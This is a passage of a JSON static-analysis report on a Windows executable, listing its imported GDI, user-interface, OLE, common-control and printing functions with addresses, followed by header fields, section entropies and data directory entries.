  3829. "name": "GetPaletteEntries",
  3830. "address": "0x46f404"
  3831. },
  3832. {
  3833. "name": "GetObjectA",
  3834. "address": "0x46f408"
  3835. },
  3836. {
  3837. "name": "GetEnhMetaFilePaletteEntries",
  3838. "address": "0x46f40c"
  3839. },
  3840. {
  3841. "name": "GetEnhMetaFileHeader",
  3842. "address": "0x46f410"
  3843. },
  3844. {
  3845. "name": "GetEnhMetaFileDescriptionA",
  3846. "address": "0x46f414"
  3847. },
  3848. {
  3849. "name": "GetEnhMetaFileBits",
  3850. "address": "0x46f418"
  3851. },
  3852. {
  3853. "name": "GetDeviceCaps",
  3854. "address": "0x46f41c"
  3855. },
  3856. {
  3857. "name": "GetDIBits",
  3858. "address": "0x46f420"
  3859. },
  3860. {
  3861. "name": "GetDIBColorTable",
  3862. "address": "0x46f424"
  3863. },
  3864. {
  3865. "name": "GetDCOrgEx",
  3866. "address": "0x46f428"
  3867. },
  3868. {
  3869. "name": "GetCurrentPositionEx",
  3870. "address": "0x46f42c"
  3871. },
  3872. {
  3873. "name": "GetClipBox",
  3874. "address": "0x46f430"
  3875. },
  3876. {
  3877. "name": "GetBrushOrgEx",
  3878. "address": "0x46f434"
  3879. },
  3880. {
  3881. "name": "GetBitmapBits",
  3882. "address": "0x46f438"
  3883. },
  3884. {
  3885. "name": "ExcludeClipRect",
  3886. "address": "0x46f43c"
  3887. },
  3888. {
  3889. "name": "EndPage",
  3890. "address": "0x46f440"
  3891. },
  3892. {
  3893. "name": "EndDoc",
  3894. "address": "0x46f444"
  3895. },
  3896. {
  3897. "name": "DeleteObject",
  3898. "address": "0x46f448"
  3899. },
  3900. {
  3901. "name": "DeleteEnhMetaFile",
  3902. "address": "0x46f44c"
  3903. },
  3904. {
  3905. "name": "DeleteDC",
  3906. "address": "0x46f450"
  3907. },
  3908. {
  3909. "name": "CreateSolidBrush",
  3910. "address": "0x46f454"
  3911. },
  3912. {
  3913. "name": "CreatePenIndirect",
  3914. "address": "0x46f458"
  3915. },
  3916. {
  3917. "name": "CreatePalette",
  3918. "address": "0x46f45c"
  3919. },
  3920. {
  3921. "name": "CreateICA",
  3922. "address": "0x46f460"
  3923. },
  3924. {
  3925. "name": "CreateHalftonePalette",
  3926. "address": "0x46f464"
  3927. },
  3928. {
  3929. "name": "CreateFontIndirectA",
  3930. "address": "0x46f468"
  3931. },
  3932. {
  3933. "name": "CreateEnhMetaFileA",
  3934. "address": "0x46f46c"
  3935. },
  3936. {
  3937. "name": "CreateDIBitmap",
  3938. "address": "0x46f470"
  3939. },
  3940. {
  3941. "name": "CreateDIBSection",
  3942. "address": "0x46f474"
  3943. },
  3944. {
  3945. "name": "CreateDCA",
  3946. "address": "0x46f478"
  3947. },
  3948. {
  3949. "name": "CreateCompatibleDC",
  3950. "address": "0x46f47c"
  3951. },
  3952. {
  3953. "name": "CreateCompatibleBitmap",
  3954. "address": "0x46f480"
  3955. },
  3956. {
  3957. "name": "CreateBrushIndirect",
  3958. "address": "0x46f484"
  3959. },
  3960. {
  3961. "name": "CreateBitmap",
  3962. "address": "0x46f488"
  3963. },
  3964. {
  3965. "name": "CopyEnhMetaFileA",
  3966. "address": "0x46f48c"
  3967. },
  3968. {
  3969. "name": "CloseEnhMetaFile",
  3970. "address": "0x46f490"
  3971. },
  3972. {
  3973. "name": "BitBlt",
  3974. "address": "0x46f494"
  3975. }
  3976. ],
  3977. "dll": "gdi32.dll"
  3978. },
  3979. {
  3980. "imports": [
  3981. {
  3982. "name": "CreateWindowExA",
  3983. "address": "0x46f49c"
  3984. },
  3985. {
  3986. "name": "WindowFromPoint",
  3987. "address": "0x46f4a0"
  3988. },
  3989. {
  3990. "name": "WinHelpA",
  3991. "address": "0x46f4a4"
  3992. },
  3993. {
  3994. "name": "WaitMessage",
  3995. "address": "0x46f4a8"
  3996. },
  3997. {
  3998. "name": "UpdateWindow",
  3999. "address": "0x46f4ac"
  4000. },
  4001. {
  4002. "name": "UnregisterClassA",
  4003. "address": "0x46f4b0"
  4004. },
  4005. {
  4006. "name": "UnhookWindowsHookEx",
  4007. "address": "0x46f4b4"
  4008. },
  4009. {
  4010. "name": "TranslateMessage",
  4011. "address": "0x46f4b8"
  4012. },
  4013. {
  4014. "name": "TranslateMDISysAccel",
  4015. "address": "0x46f4bc"
  4016. },
  4017. {
  4018. "name": "TrackPopupMenu",
  4019. "address": "0x46f4c0"
  4020. },
  4021. {
  4022. "name": "SystemParametersInfoA",
  4023. "address": "0x46f4c4"
  4024. },
  4025. {
  4026. "name": "ShowWindow",
  4027. "address": "0x46f4c8"
  4028. },
  4029. {
  4030. "name": "ShowScrollBar",
  4031. "address": "0x46f4cc"
  4032. },
  4033. {
  4034. "name": "ShowOwnedPopups",
  4035. "address": "0x46f4d0"
  4036. },
  4037. {
  4038. "name": "ShowCursor",
  4039. "address": "0x46f4d4"
  4040. },
  4041. {
  4042. "name": "SetWindowsHookExA",
  4043. "address": "0x46f4d8"
  4044. },
  4045. {
  4046. "name": "SetWindowTextA",
  4047. "address": "0x46f4dc"
  4048. },
  4049. {
  4050. "name": "SetWindowPos",
  4051. "address": "0x46f4e0"
  4052. },
  4053. {
  4054. "name": "SetWindowPlacement",
  4055. "address": "0x46f4e4"
  4056. },
  4057. {
  4058. "name": "SetWindowLongA",
  4059. "address": "0x46f4e8"
  4060. },
  4061. {
  4062. "name": "SetTimer",
  4063. "address": "0x46f4ec"
  4064. },
  4065. {
  4066. "name": "SetScrollRange",
  4067. "address": "0x46f4f0"
  4068. },
  4069. {
  4070. "name": "SetScrollPos",
  4071. "address": "0x46f4f4"
  4072. },
  4073. {
  4074. "name": "SetScrollInfo",
  4075. "address": "0x46f4f8"
  4076. },
  4077. {
  4078. "name": "SetRect",
  4079. "address": "0x46f4fc"
  4080. },
  4081. {
  4082. "name": "SetPropA",
  4083. "address": "0x46f500"
  4084. },
  4085. {
  4086. "name": "SetParent",
  4087. "address": "0x46f504"
  4088. },
  4089. {
  4090. "name": "SetMenuItemInfoA",
  4091. "address": "0x46f508"
  4092. },
  4093. {
  4094. "name": "SetMenu",
  4095. "address": "0x46f50c"
  4096. },
  4097. {
  4098. "name": "SetKeyboardState",
  4099. "address": "0x46f510"
  4100. },
  4101. {
  4102. "name": "SetForegroundWindow",
  4103. "address": "0x46f514"
  4104. },
  4105. {
  4106. "name": "SetFocus",
  4107. "address": "0x46f518"
  4108. },
  4109. {
  4110. "name": "SetCursor",
  4111. "address": "0x46f51c"
  4112. },
  4113. {
  4114. "name": "SetClipboardData",
  4115. "address": "0x46f520"
  4116. },
  4117. {
  4118. "name": "SetClassLongA",
  4119. "address": "0x46f524"
  4120. },
  4121. {
  4122. "name": "SetCapture",
  4123. "address": "0x46f528"
  4124. },
  4125. {
  4126. "name": "SetActiveWindow",
  4127. "address": "0x46f52c"
  4128. },
  4129. {
  4130. "name": "SendMessageA",
  4131. "address": "0x46f530"
  4132. },
  4133. {
  4134. "name": "ScrollWindow",
  4135. "address": "0x46f534"
  4136. },
  4137. {
  4138. "name": "ScreenToClient",
  4139. "address": "0x46f538"
  4140. },
  4141. {
  4142. "name": "RemovePropA",
  4143. "address": "0x46f53c"
  4144. },
  4145. {
  4146. "name": "RemoveMenu",
  4147. "address": "0x46f540"
  4148. },
  4149. {
  4150. "name": "ReleaseDC",
  4151. "address": "0x46f544"
  4152. },
  4153. {
  4154. "name": "ReleaseCapture",
  4155. "address": "0x46f548"
  4156. },
  4157. {
  4158. "name": "RegisterWindowMessageA",
  4159. "address": "0x46f54c"
  4160. },
  4161. {
  4162. "name": "RegisterClipboardFormatA",
  4163. "address": "0x46f550"
  4164. },
  4165. {
  4166. "name": "RegisterClassA",
  4167. "address": "0x46f554"
  4168. },
  4169. {
  4170. "name": "RedrawWindow",
  4171. "address": "0x46f558"
  4172. },
  4173. {
  4174. "name": "PtInRect",
  4175. "address": "0x46f55c"
  4176. },
  4177. {
  4178. "name": "PostQuitMessage",
  4179. "address": "0x46f560"
  4180. },
  4181. {
  4182. "name": "PostMessageA",
  4183. "address": "0x46f564"
  4184. },
  4185. {
  4186. "name": "PeekMessageA",
  4187. "address": "0x46f568"
  4188. },
  4189. {
  4190. "name": "OpenClipboard",
  4191. "address": "0x46f56c"
  4192. },
  4193. {
  4194. "name": "OffsetRect",
  4195. "address": "0x46f570"
  4196. },
  4197. {
  4198. "name": "OemToCharA",
  4199. "address": "0x46f574"
  4200. },
  4201. {
  4202. "name": "MessageBoxA",
  4203. "address": "0x46f578"
  4204. },
  4205. {
  4206. "name": "MessageBeep",
  4207. "address": "0x46f57c"
  4208. },
  4209. {
  4210. "name": "MapWindowPoints",
  4211. "address": "0x46f580"
  4212. },
  4213. {
  4214. "name": "MapVirtualKeyA",
  4215. "address": "0x46f584"
  4216. },
  4217. {
  4218. "name": "LoadStringA",
  4219. "address": "0x46f588"
  4220. },
  4221. {
  4222. "name": "LoadKeyboardLayoutA",
  4223. "address": "0x46f58c"
  4224. },
  4225. {
  4226. "name": "LoadIconA",
  4227. "address": "0x46f590"
  4228. },
  4229. {
  4230. "name": "LoadCursorA",
  4231. "address": "0x46f594"
  4232. },
  4233. {
  4234. "name": "LoadBitmapA",
  4235. "address": "0x46f598"
  4236. },
  4237. {
  4238. "name": "KillTimer",
  4239. "address": "0x46f59c"
  4240. },
  4241. {
  4242. "name": "IsZoomed",
  4243. "address": "0x46f5a0"
  4244. },
  4245. {
  4246. "name": "IsWindowVisible",
  4247. "address": "0x46f5a4"
  4248. },
  4249. {
  4250. "name": "IsWindowEnabled",
  4251. "address": "0x46f5a8"
  4252. },
  4253. {
  4254. "name": "IsWindow",
  4255. "address": "0x46f5ac"
  4256. },
  4257. {
  4258. "name": "IsRectEmpty",
  4259. "address": "0x46f5b0"
  4260. },
  4261. {
  4262. "name": "IsIconic",
  4263. "address": "0x46f5b4"
  4264. },
  4265. {
  4266. "name": "IsDialogMessageA",
  4267. "address": "0x46f5b8"
  4268. },
  4269. {
  4270. "name": "IsChild",
  4271. "address": "0x46f5bc"
  4272. },
  4273. {
  4274. "name": "IsCharAlphaNumericA",
  4275. "address": "0x46f5c0"
  4276. },
  4277. {
  4278. "name": "IsCharAlphaA",
  4279. "address": "0x46f5c4"
  4280. },
  4281. {
  4282. "name": "InvalidateRect",
  4283. "address": "0x46f5c8"
  4284. },
  4285. {
  4286. "name": "IntersectRect",
  4287. "address": "0x46f5cc"
  4288. },
  4289. {
  4290. "name": "InsertMenuItemA",
  4291. "address": "0x46f5d0"
  4292. },
  4293. {
  4294. "name": "InsertMenuA",
  4295. "address": "0x46f5d4"
  4296. },
  4297. {
  4298. "name": "InflateRect",
  4299. "address": "0x46f5d8"
  4300. },
  4301. {
  4302. "name": "GetWindowThreadProcessId",
  4303. "address": "0x46f5dc"
  4304. },
  4305. {
  4306. "name": "GetWindowTextA",
  4307. "address": "0x46f5e0"
  4308. },
  4309. {
  4310. "name": "GetWindowRect",
  4311. "address": "0x46f5e4"
  4312. },
  4313. {
  4314. "name": "GetWindowPlacement",
  4315. "address": "0x46f5e8"
  4316. },
  4317. {
  4318. "name": "GetWindowLongA",
  4319. "address": "0x46f5ec"
  4320. },
  4321. {
  4322. "name": "GetWindowDC",
  4323. "address": "0x46f5f0"
  4324. },
  4325. {
  4326. "name": "GetTopWindow",
  4327. "address": "0x46f5f4"
  4328. },
  4329. {
  4330. "name": "GetSystemMetrics",
  4331. "address": "0x46f5f8"
  4332. },
  4333. {
  4334. "name": "GetSystemMenu",
  4335. "address": "0x46f5fc"
  4336. },
  4337. {
  4338. "name": "GetSysColorBrush",
  4339. "address": "0x46f600"
  4340. },
  4341. {
  4342. "name": "GetSysColor",
  4343. "address": "0x46f604"
  4344. },
  4345. {
  4346. "name": "GetSubMenu",
  4347. "address": "0x46f608"
  4348. },
  4349. {
  4350. "name": "GetScrollRange",
  4351. "address": "0x46f60c"
  4352. },
  4353. {
  4354. "name": "GetScrollPos",
  4355. "address": "0x46f610"
  4356. },
  4357. {
  4358. "name": "GetScrollInfo",
  4359. "address": "0x46f614"
  4360. },
  4361. {
  4362. "name": "GetPropA",
  4363. "address": "0x46f618"
  4364. },
  4365. {
  4366. "name": "GetParent",
  4367. "address": "0x46f61c"
  4368. },
  4369. {
  4370. "name": "GetWindow",
  4371. "address": "0x46f620"
  4372. },
  4373. {
  4374. "name": "GetMessageTime",
  4375. "address": "0x46f624"
  4376. },
  4377. {
  4378. "name": "GetMenuStringA",
  4379. "address": "0x46f628"
  4380. },
  4381. {
  4382. "name": "GetMenuState",
  4383. "address": "0x46f62c"
  4384. },
  4385. {
  4386. "name": "GetMenuItemInfoA",
  4387. "address": "0x46f630"
  4388. },
  4389. {
  4390. "name": "GetMenuItemID",
  4391. "address": "0x46f634"
  4392. },
  4393. {
  4394. "name": "GetMenuItemCount",
  4395. "address": "0x46f638"
  4396. },
  4397. {
  4398. "name": "GetMenu",
  4399. "address": "0x46f63c"
  4400. },
  4401. {
  4402. "name": "GetLastActivePopup",
  4403. "address": "0x46f640"
  4404. },
  4405. {
  4406. "name": "GetKeyboardState",
  4407. "address": "0x46f644"
  4408. },
  4409. {
  4410. "name": "GetKeyboardLayoutList",
  4411. "address": "0x46f648"
  4412. },
  4413. {
  4414. "name": "GetKeyboardLayout",
  4415. "address": "0x46f64c"
  4416. },
  4417. {
  4418. "name": "GetKeyState",
  4419. "address": "0x46f650"
  4420. },
  4421. {
  4422. "name": "GetKeyNameTextA",
  4423. "address": "0x46f654"
  4424. },
  4425. {
  4426. "name": "GetIconInfo",
  4427. "address": "0x46f658"
  4428. },
  4429. {
  4430. "name": "GetForegroundWindow",
  4431. "address": "0x46f65c"
  4432. },
  4433. {
  4434. "name": "GetFocus",
  4435. "address": "0x46f660"
  4436. },
  4437. {
  4438. "name": "GetDesktopWindow",
  4439. "address": "0x46f664"
  4440. },
  4441. {
  4442. "name": "GetDCEx",
  4443. "address": "0x46f668"
  4444. },
  4445. {
  4446. "name": "GetDC",
  4447. "address": "0x46f66c"
  4448. },
  4449. {
  4450. "name": "GetCursorPos",
  4451. "address": "0x46f670"
  4452. },
  4453. {
  4454. "name": "GetCursor",
  4455. "address": "0x46f674"
  4456. },
  4457. {
  4458. "name": "GetClipboardData",
  4459. "address": "0x46f678"
  4460. },
  4461. {
  4462. "name": "GetClientRect",
  4463. "address": "0x46f67c"
  4464. },
  4465. {
  4466. "name": "GetClassNameA",
  4467. "address": "0x46f680"
  4468. },
  4469. {
  4470. "name": "GetClassInfoA",
  4471. "address": "0x46f684"
  4472. },
  4473. {
  4474. "name": "GetCapture",
  4475. "address": "0x46f688"
  4476. },
  4477. {
  4478. "name": "GetActiveWindow",
  4479. "address": "0x46f68c"
  4480. },
  4481. {
  4482. "name": "FrameRect",
  4483. "address": "0x46f690"
  4484. },
  4485. {
  4486. "name": "FindWindowA",
  4487. "address": "0x46f694"
  4488. },
  4489. {
  4490. "name": "FillRect",
  4491. "address": "0x46f698"
  4492. },
  4493. {
  4494. "name": "EqualRect",
  4495. "address": "0x46f69c"
  4496. },
  4497. {
  4498. "name": "EnumWindows",
  4499. "address": "0x46f6a0"
  4500. },
  4501. {
  4502. "name": "EnumThreadWindows",
  4503. "address": "0x46f6a4"
  4504. },
  4505. {
  4506. "name": "EnumClipboardFormats",
  4507. "address": "0x46f6a8"
  4508. },
  4509. {
  4510. "name": "EndPaint",
  4511. "address": "0x46f6ac"
  4512. },
  4513. {
  4514. "name": "EndDeferWindowPos",
  4515. "address": "0x46f6b0"
  4516. },
  4517. {
  4518. "name": "EnableWindow",
  4519. "address": "0x46f6b4"
  4520. },
  4521. {
  4522. "name": "EnableScrollBar",
  4523. "address": "0x46f6b8"
  4524. },
  4525. {
  4526. "name": "EnableMenuItem",
  4527. "address": "0x46f6bc"
  4528. },
  4529. {
  4530. "name": "EmptyClipboard",
  4531. "address": "0x46f6c0"
  4532. },
  4533. {
  4534. "name": "DrawTextA",
  4535. "address": "0x46f6c4"
  4536. },
  4537. {
  4538. "name": "DrawMenuBar",
  4539. "address": "0x46f6c8"
  4540. },
  4541. {
  4542. "name": "DrawIconEx",
  4543. "address": "0x46f6cc"
  4544. },
  4545. {
  4546. "name": "DrawIcon",
  4547. "address": "0x46f6d0"
  4548. },
  4549. {
  4550. "name": "DrawFrameControl",
  4551. "address": "0x46f6d4"
  4552. },
  4553. {
  4554. "name": "DrawEdge",
  4555. "address": "0x46f6d8"
  4556. },
  4557. {
  4558. "name": "DispatchMessageA",
  4559. "address": "0x46f6dc"
  4560. },
  4561. {
  4562. "name": "DestroyWindow",
  4563. "address": "0x46f6e0"
  4564. },
  4565. {
  4566. "name": "DestroyMenu",
  4567. "address": "0x46f6e4"
  4568. },
  4569. {
  4570. "name": "DestroyIcon",
  4571. "address": "0x46f6e8"
  4572. },
  4573. {
  4574. "name": "DestroyCursor",
  4575. "address": "0x46f6ec"
  4576. },
  4577. {
  4578. "name": "DeleteMenu",
  4579. "address": "0x46f6f0"
  4580. },
  4581. {
  4582. "name": "DeferWindowPos",
  4583. "address": "0x46f6f4"
  4584. },
  4585. {
  4586. "name": "DefWindowProcA",
  4587. "address": "0x46f6f8"
  4588. },
  4589. {
  4590. "name": "DefMDIChildProcA",
  4591. "address": "0x46f6fc"
  4592. },
  4593. {
  4594. "name": "DefFrameProcA",
  4595. "address": "0x46f700"
  4596. },
  4597. {
  4598. "name": "CreatePopupMenu",
  4599. "address": "0x46f704"
  4600. },
  4601. {
  4602. "name": "CreateMenu",
  4603. "address": "0x46f708"
  4604. },
  4605. {
  4606. "name": "CreateIcon",
  4607. "address": "0x46f70c"
  4608. },
  4609. {
  4610. "name": "CloseClipboard",
  4611. "address": "0x46f710"
  4612. },
  4613. {
  4614. "name": "ClientToScreen",
  4615. "address": "0x46f714"
  4616. },
  4617. {
  4618. "name": "CheckMenuItem",
  4619. "address": "0x46f718"
  4620. },
  4621. {
  4622. "name": "CallWindowProcA",
  4623. "address": "0x46f71c"
  4624. },
  4625. {
  4626. "name": "CallNextHookEx",
  4627. "address": "0x46f720"
  4628. },
  4629. {
  4630. "name": "BeginPaint",
  4631. "address": "0x46f724"
  4632. },
  4633. {
  4634. "name": "BeginDeferWindowPos",
  4635. "address": "0x46f728"
  4636. },
  4637. {
  4638. "name": "CharNextA",
  4639. "address": "0x46f72c"
  4640. },
  4641. {
  4642. "name": "CharLowerBuffA",
  4643. "address": "0x46f730"
  4644. },
  4645. {
  4646. "name": "CharLowerA",
  4647. "address": "0x46f734"
  4648. },
  4649. {
  4650. "name": "CharUpperBuffA",
  4651. "address": "0x46f738"
  4652. },
  4653. {
  4654. "name": "CharToOemA",
  4655. "address": "0x46f73c"
  4656. },
  4657. {
  4658. "name": "AdjustWindowRectEx",
  4659. "address": "0x46f740"
  4660. },
  4661. {
  4662. "name": "ActivateKeyboardLayout",
  4663. "address": "0x46f744"
  4664. }
  4665. ],
  4666. "dll": "user32.dll"
  4667. },
  4668. {
  4669. "imports": [
  4670. {
  4671. "name": "Sleep",
  4672. "address": "0x46f74c"
  4673. }
  4674. ],
  4675. "dll": "kernel32.dll"
  4676. },
  4677. {
  4678. "imports": [
  4679. {
  4680. "name": "SafeArrayPtrOfIndex",
  4681. "address": "0x46f754"
  4682. },
  4683. {
  4684. "name": "SafeArrayGetUBound",
  4685. "address": "0x46f758"
  4686. },
  4687. {
  4688. "name": "SafeArrayGetLBound",
  4689. "address": "0x46f75c"
  4690. },
  4691. {
  4692. "name": "SafeArrayCreate",
  4693. "address": "0x46f760"
  4694. },
  4695. {
  4696. "name": "VariantChangeType",
  4697. "address": "0x46f764"
  4698. },
  4699. {
  4700. "name": "VariantCopy",
  4701. "address": "0x46f768"
  4702. },
  4703. {
  4704. "name": "VariantClear",
  4705. "address": "0x46f76c"
  4706. },
  4707. {
  4708. "name": "VariantInit",
  4709. "address": "0x46f770"
  4710. }
  4711. ],
  4712. "dll": "oleaut32.dll"
  4713. },
  4714. {
  4715. "imports": [
  4716. {
  4717. "name": "CreateStreamOnHGlobal",
  4718. "address": "0x46f778"
  4719. },
  4720. {
  4721. "name": "IsAccelerator",
  4722. "address": "0x46f77c"
  4723. },
  4724. {
  4725. "name": "OleDraw",
  4726. "address": "0x46f780"
  4727. },
  4728. {
  4729. "name": "OleSetMenuDescriptor",
  4730. "address": "0x46f784"
  4731. },
  4732. {
  4733. "name": "CoTaskMemFree",
  4734. "address": "0x46f788"
  4735. },
  4736. {
  4737. "name": "ProgIDFromCLSID",
  4738. "address": "0x46f78c"
  4739. },
  4740. {
  4741. "name": "StringFromCLSID",
  4742. "address": "0x46f790"
  4743. },
  4744. {
  4745. "name": "CoCreateInstance",
  4746. "address": "0x46f794"
  4747. },
  4748. {
  4749. "name": "CoGetClassObject",
  4750. "address": "0x46f798"
  4751. },
  4752. {
  4753. "name": "CoUninitialize",
  4754. "address": "0x46f79c"
  4755. },
  4756. {
  4757. "name": "CoInitialize",
  4758. "address": "0x46f7a0"
  4759. },
  4760. {
  4761. "name": "IsEqualGUID",
  4762. "address": "0x46f7a4"
  4763. }
  4764. ],
  4765. "dll": "ole32.dll"
  4766. },
  4767. {
  4768. "imports": [
  4769. {
  4770. "name": "GetErrorInfo",
  4771. "address": "0x46f7ac"
  4772. },
  4773. {
  4774. "name": "GetActiveObject",
  4775. "address": "0x46f7b0"
  4776. },
  4777. {
  4778. "name": "SysFreeString",
  4779. "address": "0x46f7b4"
  4780. }
  4781. ],
  4782. "dll": "oleaut32.dll"
  4783. },
  4784. {
  4785. "imports": [
  4786. {
  4787. "name": "ImageList_SetIconSize",
  4788. "address": "0x46f7bc"
  4789. },
  4790. {
  4791. "name": "ImageList_GetIconSize",
  4792. "address": "0x46f7c0"
  4793. },
  4794. {
  4795. "name": "ImageList_Write",
  4796. "address": "0x46f7c4"
  4797. },
  4798. {
  4799. "name": "ImageList_Read",
  4800. "address": "0x46f7c8"
  4801. },
  4802. {
  4803. "name": "ImageList_GetDragImage",
  4804. "address": "0x46f7cc"
  4805. },
  4806. {
  4807. "name": "ImageList_DragShowNolock",
  4808. "address": "0x46f7d0"
  4809. },
  4810. {
  4811. "name": "ImageList_SetDragCursorImage",
  4812. "address": "0x46f7d4"
  4813. },
  4814. {
  4815. "name": "ImageList_DragMove",
  4816. "address": "0x46f7d8"
  4817. },
  4818. {
  4819. "name": "ImageList_DragLeave",
  4820. "address": "0x46f7dc"
  4821. },
  4822. {
  4823. "name": "ImageList_DragEnter",
  4824. "address": "0x46f7e0"
  4825. },
  4826. {
  4827. "name": "ImageList_EndDrag",
  4828. "address": "0x46f7e4"
  4829. },
  4830. {
  4831. "name": "ImageList_BeginDrag",
  4832. "address": "0x46f7e8"
  4833. },
  4834. {
  4835. "name": "ImageList_Remove",
  4836. "address": "0x46f7ec"
  4837. },
  4838. {
  4839. "name": "ImageList_DrawEx",
  4840. "address": "0x46f7f0"
  4841. },
  4842. {
  4843. "name": "ImageList_Draw",
  4844. "address": "0x46f7f4"
  4845. },
  4846. {
  4847. "name": "ImageList_GetBkColor",
  4848. "address": "0x46f7f8"
  4849. },
  4850. {
  4851. "name": "ImageList_SetBkColor",
  4852. "address": "0x46f7fc"
  4853. },
  4854. {
  4855. "name": "ImageList_ReplaceIcon",
  4856. "address": "0x46f800"
  4857. },
  4858. {
  4859. "name": "ImageList_Add",
  4860. "address": "0x46f804"
  4861. },
  4862. {
  4863. "name": "ImageList_GetImageCount",
  4864. "address": "0x46f808"
  4865. },
  4866. {
  4867. "name": "ImageList_Destroy",
  4868. "address": "0x46f80c"
  4869. },
  4870. {
  4871. "name": "ImageList_Create",
  4872. "address": "0x46f810"
  4873. }
  4874. ],
  4875. "dll": "comctl32.dll"
  4876. },
  4877. {
  4878. "imports": [
  4879. {
  4880. "name": "OpenPrinterA",
  4881. "address": "0x46f818"
  4882. },
  4883. {
  4884. "name": "EnumPrintersA",
  4885. "address": "0x46f81c"
  4886. },
  4887. {
  4888. "name": "DocumentPropertiesA",
  4889. "address": "0x46f820"
  4890. },
  4891. {
  4892. "name": "ClosePrinter",
  4893. "address": "0x46f824"
  4894. }
  4895. ],
  4896. "dll": "winspool.drv"
  4897. },
  4898. {
  4899. "imports": [
  4900. {
  4901. "name": "PrintDlgA",
  4902. "address": "0x46f82c"
  4903. }
  4904. ],
  4905. "dll": "comdlg32.dll"
  4906. }
  4907. ],
  4908. "digital_signers": null,
  4909. "exported_dll_name": null,
  4910. "actual_checksum": "0x000a0c7b",
  4911. "overlay": null,
  4912. "imagebase": "0x00400000",
  4913. "reported_checksum": "0x00000000",
  4914. "icon_hash": null,
  4915. "entrypoint": "0x0046304c",
  4916. "timestamp": "1992-03-19 06:54:55",
  4917. "osversion": "4.0",
  4918. "sections": [
  4919. {
  4920. "name": "CODE",
  4921. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
  4922. "virtual_address": "0x00001000",
  4923. "size_of_data": "0x00062200",
  4924. "entropy": "6.54",
  4925. "raw_address": "0x00000400",
  4926. "virtual_size": "0x00062094",
  4927. "characteristics_raw": "0x60000020"
  4928. },
  4929. {
  4930. "name": "DATA",
  4931. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  4932. "virtual_address": "0x00064000",
  4933. "size_of_data": "0x00009600",
  4934. "entropy": "4.97",
  4935. "raw_address": "0x00062600",
  4936. "virtual_size": "0x00009528",
  4937. "characteristics_raw": "0xc0000040"
  4938. },
  4939. {
  4940. "name": "BSS",
  4941. "characteristics": "IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  4942. "virtual_address": "0x0006e000",
  4943. "size_of_data": "0x00000000",
  4944. "entropy": "0.00",
  4945. "raw_address": "0x0006bc00",
  4946. "virtual_size": "0x00000d59",
  4947. "characteristics_raw": "0xc0000000"
  4948. },
  4949. {
  4950. "name": ".idata",
  4951. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  4952. "virtual_address": "0x0006f000",
  4953. "size_of_data": "0x00002600",
  4954. "entropy": "5.01",
  4955. "raw_address": "0x0006bc00",
  4956. "virtual_size": "0x00002540",
  4957. "characteristics_raw": "0xc0000040"
  4958. },
  4959. {
  4960. "name": ".tls",
  4961. "characteristics": "IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  4962. "virtual_address": "0x00072000",
  4963. "size_of_data": "0x00000000",
  4964. "entropy": "0.00",
  4965. "raw_address": "0x0006e200",
  4966. "virtual_size": "0x00000010",
  4967. "characteristics_raw": "0xc0000000"
  4968. },
  4969. {
  4970. "name": ".rdata",
  4971. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ",
  4972. "virtual_address": "0x00073000",
  4973. "size_of_data": "0x00000200",
  4974. "entropy": "0.21",
  4975. "raw_address": "0x0006e200",
  4976. "virtual_size": "0x00000018",
  4977. "characteristics_raw": "0x50000040"
  4978. },
  4979. {
  4980. "name": ".reloc",
  4981. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ",
  4982. "virtual_address": "0x00074000",
  4983. "size_of_data": "0x00007200",
  4984. "entropy": "6.67",
  4985. "raw_address": "0x0006e400",
  4986. "virtual_size": "0x00007108",
  4987. "characteristics_raw": "0x50000040"
  4988. },
  4989. {
  4990. "name": ".rsrc",
  4991. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ",
  4992. "virtual_address": "0x0007c000",
  4993. "size_of_data": "0x00026400",
  4994. "entropy": "7.04",
  4995. "raw_address": "0x00075600",
  4996. "virtual_size": "0x000263d8",
  4997. "characteristics_raw": "0x50000040"
  4998. }
  4999. ],
  5000. "resources": [],
  5001. "dirents": [
  5002. {
  5003. "virtual_address": "0x00000000",
  5004. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
  5005. "size": "0x00000000"
  5006. },
  5007. {
  5008. "virtual_address": "0x0006f000",
  5009. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
  5010. "size": "0x00002540"
  5011. },
  5012. {
  5013. "virtual_address": "0x0007c000",
  5014. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
  5015. "size": "0x000263d8"
  5016. },
  5017. {
  5018. "virtual_address": "0x00000000",
  5019. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
  5020. "size": "0x00000000"
  5021. },
  5022. {
  5023. "virtual_address": "0x00000000",
  5024. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
  5025. "size": "0x00000000"
  5026. },
  5027. {
  5028. "virtual_address": "0x00074000",
  5029. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
  5030. "size": "0x00007108"
  5031. },
  5032. {
  5033. "virtual_address": "0x00000000",
  5034. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
  5035. "size": "0x00000000"
  5036. },
  5037. {
  5038. "virtual_address": "0x00000000",
  5039. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
  5040. "size": "0x00000000"
  5041. },
  5042. {
  5043. "virtual_address": "0x00000000",
  5044. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
  5045. "size": "0x00000000"
  5046. },
  5047. {
  5048. "virtual_address": "0x00073000",
  5049. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
  5050. "size": "0x00000018"
  5051. },
  5052. {
  5053. "virtual_address": "0x00000000",
